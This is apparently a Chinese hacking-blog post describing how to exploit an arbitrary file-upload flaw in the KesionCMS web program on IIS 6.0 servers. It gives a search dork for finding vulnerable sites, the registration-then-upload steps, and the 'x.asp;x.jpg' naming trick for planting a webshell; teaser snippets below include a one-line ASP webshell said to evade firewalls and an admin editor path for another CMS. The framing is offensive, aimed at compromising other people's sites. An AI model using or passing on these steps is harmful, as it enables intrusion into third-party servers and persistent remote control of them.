科汛任意用户上传漏洞(IIS6.0解析漏洞)

hacker5年前 (2020-05-31)黑客文章1232

科汛网站程序任意用户上传漏洞利用, 主要也要用到iis6.0的解析漏洞,如果服务器是其他版本的IIS则无效。

搜索关键字：

inurl:User/UserReg.asp intitle:新会员注册

打开网站的注册页面，注册一个账户，然后直接跳到KS_Editor/SelectUpFiles.asp页面，上传大马，注意大马后缀名为

x.asp;x.jpg或者x.asa;x.jpg的格式，自动命名的钩选上，上传即可，然后右键单击查看源文件，拉到最下面，即可看见大马路径。

131211w

123awer9

标签: 黑客技术

返回列表

首先必须要先登入管理后台。进入后台管理后，在网站地址后面加上 admin/southidceditor/admin_style.asp 这是良精南方的远程编辑器路径。...

如果你是一位网络管理员或者是一位普通的拨号用户，可能经常会遇到这样一种情形，那就是访问某一个网站时可能会花费好长时间，或者根本就无法访问需要的网站，这样我们许多宝贵的时间就消耗在等待上了。那我们有没有...

大家好，今天分享这篇Writeup是关于Youtube的两个漏洞，确切来说，是Youtube Studio平台（https://studio.youtube.com/）漏洞。作者通过其中涉及的视频...

什么叫Parox Proxy？ Parox Proxy是一种根据Java的Web代理商，用以评定Web程序运行中的系统漏洞。此专用工具适用查询和编写HTTP / HTTPS信息，以变更表一个字段和C...

什么是Angry IP Scanner？ Angry IP Scanner是一个混合开发和一个开源系统互联网扫描机，建立迅速，便于应用。网络工程师一般应用大中型和中小型企业，金融机构和政府部门。此...

几个变性的asp–过防火墙过狗效果都不错 <%Y=request(“x”)%> <%execute(Y)%> < %eval (eval(chr(114)+chr(...

找黑客平台